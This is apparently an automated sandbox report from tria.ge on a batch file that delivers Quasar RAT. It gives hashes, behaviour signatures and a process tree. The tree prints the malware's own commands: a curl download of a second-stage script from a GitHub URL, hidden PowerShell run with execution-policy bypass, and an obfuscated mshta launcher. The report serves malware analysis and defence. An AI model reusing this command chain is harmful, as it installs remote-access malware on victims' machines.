Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
35s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20231215-en -
resource tags
-
submitted
12/02/2024, 02:23
General
-
Target
gizmo.bat
-
Size
13KB
-
MD5
4f5e2a45a205c03f35cfc258a6fa78c4
-
SHA1
409cc00e8a84f9feebaaeca597df0e7840433ea7
-
SHA256
a74b4c512087be32af7863d596f2946ba0e160b863aa3ba2380b85cf6b607a14
-
SHA512
cc769438aea44a2197708631e5a72f4fdbd6c1ddf0716f98c2eb297cfacfb10c6a3d8dd6f42f6270f47be36b2055ff4cf174c5e131b9fd7ee785bf7f1503a32a
-
SSDEEP
384:uYfiuv5LxLQ8lWxuzgUKEs7huHSH2vUV2EUbPxCJ0VbHAPVg//9hRaYc5Sjm5FFi:uY6uv5LxLQ8lWxuzgUKEs7huHSH2vUV2
Malware Config
Extracted
quasar
-
reconnect_delay
3000
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Executes dropped EXE 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of WriteProcessMemory 34 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\gizmo.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp.com 4372⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵
-
-
C:\Windows\system32\findstr.exefindstr /L /I goto C:\Users\Admin\AppData\Local\Temp\gizmo.bat2⤵
-
-
C:\Windows\system32\findstr.exefindstr /L /I set C:\Users\Admin\AppData\Local\Temp\gizmo.bat2⤵
-
-
C:\Windows\system32\findstr.exefindstr /L /I echo C:\Users\Admin\AppData\Local\Temp\gizmo.bat2⤵
-
-
C:\Windows\system32\findstr.exefindstr /L /I pause C:\Users\Admin\AppData\Local\Temp\gizmo.bat2⤵
-
-
C:\Windows\system32\find.exefind2⤵
-
-
C:\Windows\system32\find.exefind2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c type tmp2⤵
-
-
C:\Windows\system32\curl.execurl -s -o C:\Users\Admin\AppData\Local\Temp\zen.bat https://raw.githubusercontent.com/bloxiscool/a/main/zen.bat2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:FuCrQKgolT; "2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-eGPBfRrvpevKrnqohNeQ4312:ZvkurFMC=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-eGPBfRrvpevKrnqohNeQ4312:ZvkurFMC=%2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Invoke-Expression $env:OpcrxjJLSI; "3⤵
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
Filesize
14.9MB
MD5066512b7d10d9042675312fb97620adf
SHA11b346b22a2fb683a982bc63bf011fb34d7f0fbf6
SHA256d04298a5fa09ad11b5ca40bfa081e5afe363c90ed28af5bcaaec244f3370f468
SHA51271efe2294cfc27d0326e91645cd7604b0957af79e0455ab1455aeea660daf8540cf2585460ce052b351f9cc140cf85348b30da4a45ec62cdcc2a15fbc4d8e3e9
-
Filesize
324KB
MD5c5db7b712f280c3ae4f731ad7d5ea171
SHA1e8717ff0d40e01fd3b06de2aa5a401bed1c907cc
SHA256f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba
SHA512bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89
-
Filesize
32KB
MD5356e04e106f6987a19938df67dea0b76
SHA1f2fd7cde5f97427e497dfb07b7f682149dc896fb
SHA2564ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e
SHA512df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd
-
Filesize
86KB
MD588c6d7ac3e9adeccc59987bd3ddb460a
SHA15475cd2db17ca94e7df4358644d4bade91b6d5a2
SHA256959ea7a4e19f90488dd8d9098c41107231265c620818d7915768c05f306d7606
SHA5120fe82f5c53f9c26d49637005ee3d6e28d10e7e9db864e4a6b0f50893ffb7c1176dcdf914e4f3ee73c2eeebbc43c5faa00e5683bd0e11ad8afd01af042a92b865
-
Filesize
164KB
-
Filesize
64KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
64KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
64KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
64KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
64KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
164KB
-
Filesize
164KB
-
Filesize
2.0MB
-
Filesize
256KB
-
Filesize
2.0MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.6MB
-
Filesize
6.9MB
-
Filesize
756KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
24KB
-
Filesize
24KB
-
Filesize
5.3MB
-
Filesize
7.6MB
-
Filesize
712KB
-
Filesize
3.5MB
-
Filesize
10.8MB
-
Filesize
28KB
-
Filesize
424KB
-
Filesize
352KB
-
Filesize
28KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
440KB
-
Filesize
184KB
-
Filesize
4KB
-
Filesize
216KB
-
Filesize
712KB
-
Filesize
12.1MB
-
Filesize
10.8MB
-
Filesize
248KB
-
Filesize
24KB
-
Filesize
2.0MB
-
Filesize
32KB
-
Filesize
24KB
-
Filesize
32KB
-
Filesize
352KB
-
Filesize
2.0MB
-
Filesize
376KB
-
Filesize
24KB
-
Filesize
136KB
-
Filesize
1008KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
756KB
-
Filesize
10.9MB
-
Filesize
10.6MB
-
Filesize
280KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
136KB